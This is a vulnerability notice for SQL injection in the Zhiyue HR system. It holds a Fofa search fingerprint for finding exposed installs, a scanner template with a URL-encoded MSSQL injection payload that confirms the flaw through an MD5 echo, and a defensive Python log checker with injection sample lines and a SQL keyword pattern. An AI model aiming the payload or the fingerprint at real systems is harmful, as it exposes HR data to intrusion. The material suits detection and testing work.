Vulnerability description
The Zhiyue HR system has a SQL injection vulnerability in GenerateEntityFromTable.
Fofa: body="ZY.LOGO.64.png"
id: zhiyuehr-generate-entityfromtable-sqli
info:
  name: 智跃人力资源管理系统存在SQL注入漏洞
  author: Y3y1ng
  severity: critical
  verified: true
  description: |
    智跃HR系统GenerateEntityFromTable处存在SQL注入漏洞。
    Fofa: body="ZY.LOGO.64.png"
  reference:
    - https://mp.weixin.qq.com/s/gn9tY5WPy39liSaWM0CU_A
  tags: zhiyue,hr,sqli
  created: 2023/12/04
set:
  r1: randomInt(10000, 99999)
rules:
  r0:
    request:
      method: GET
      path: /resource/utils/GenerateEntityFromTable.aspx?t=1%27%2B(SELECT%20CHAR(103)%2BCHAR(87)%2BCHAR(114)%2BCHAR(112)%20WHERE%201669%3D1669%20AND%206492%20IN%20(select%20SUBSTRING(sys.fn_sqlvarbasetostr(HASHBYTES(%27MD5%27,%27{{r1}}%27)),3,32)))%2B%27
    expression: |
      response.body.bcontains(bytes(md5(string(r1))))
expression: r0()
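For defenders, a log check for requests that put SQL syntax into the `t` parameter of this endpoint. This is an added example, not part of the original template or the vendor's code. The log layout, the sample lines, and the rule that a benign `t` value is a bare table identifier are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Endpoint path from the template above; IIS/ASP.NET match it case-insensitively.
ENDPOINT = "/resource/utils/generateentityfromtable.aspx"
# Assumption: a benign `t` value is a bare table identifier.
SAFE_T = re.compile(r"[A-Za-z0-9_.\[\]]{1,128}")
SQL_WORDS = re.compile(
    r"\b(select|union|hashbytes|fn_sqlvarbasetostr|char|waitfor|exec)\b", re.I)

# Constructed sample lines, simplified layout: client method uri status.
SAMPLE_LOG = """\
10.0.0.5 GET /resource/utils/GenerateEntityFromTable.aspx?t=Employee 200
10.0.0.9 GET /resource/utils/GenerateEntityFromTable.aspx?t=1%27%2B(SELECT%20CHAR(103))%2B%27 500
10.0.0.7 GET /index.aspx?t=1%27 200
10.0.0.9 GET /resource/utils/generateentityfromtable.aspx?T=x%2527%2520union 200
"""

def inspect_line(line):
    """Return a finding for a suspicious request to the endpoint, else None."""
    parts = line.split()
    if len(parts) < 4:
        return None
    client, _method, uri, status = parts[:4]
    url = urlsplit(uri)
    if url.path.lower() != ENDPOINT:
        return None
    reasons = set()
    for name, values in parse_qs(url.query, keep_blank_values=True).items():
        if name.lower() != "t":  # ASP.NET query keys are case-insensitive
            continue
        for value in values:  # parse_qs has already URL-decoded once
            decoded = unquote(value)
            if decoded != value:
                reasons.add("double-encoded")
            if not SAFE_T.fullmatch(decoded):
                reasons.add("non-identifier")
            if SQL_WORDS.search(decoded):
                reasons.add("sql-keyword")
    if not reasons:
        return None
    return {"client": client, "status": status, "reasons": sorted(reasons)}

def scan(log_text):
    """Inspect every line and return the findings in log order."""
    return [f for f in map(inspect_line, log_text.splitlines()) if f]
```

Calling `scan(SAMPLE_LOG)` returns two findings, both from 10.0.0.9; adapt the field splitting in `inspect_line` to the real access-log format before use.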